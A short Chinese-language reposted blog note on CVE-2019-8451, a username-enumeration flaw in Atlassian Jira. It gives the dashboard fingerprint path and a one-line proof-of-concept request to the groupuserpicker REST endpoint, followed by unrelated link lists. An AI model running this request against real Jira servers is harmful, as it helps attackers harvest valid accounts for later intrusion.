(CVE-2019-8451) Atlassian Jira 信息泄露漏洞(用户名枚举) - 走看看

zoukankan html css js c++ java

(CVE-2019-8451) Atlassian Jira 信息泄露漏洞(用户名枚举)
01描述

可通过接口的返回结果，对存在的用户进行枚举

02主面板截图

标识
```
/secure/Dashboard.jspa
```
02 漏洞复现

POC：<name>为判断是否存在的用户名
```
/rest/api/latest/groupuserpicker?query=<name>&maxResults=50&showAvatar=false
```
不存用户提示

存在用户提示

不存在漏洞返回结果
查看全文

相关阅读:
vue+webpack搭建项目基础架构
 vue入门学习篇——父子组件通信
 vue入门学习篇——数据双向绑定原理及简单实现
 vue入门学习篇——挂载点、实例、模版之间的关系
 毫秒转成天、小时、分钟、秒
 可执行jar包的MANIFEST.MF
fsck系统修复
 HDFS, YARN, HBase, Hive, ZooKeeper端口说明
 解压 tar zxvf 文件名.tar.gz 压缩 tar zcvf 文件名.tar.gz 目标名
 Linux学习笔记之RedHat Enterprise Linux 6.4 使用 Centos 6 的yum源问题

原文地址：https://www.cnblogs.com/KHZ521/p/14023137.html

Copyright © 2011-2022 走看看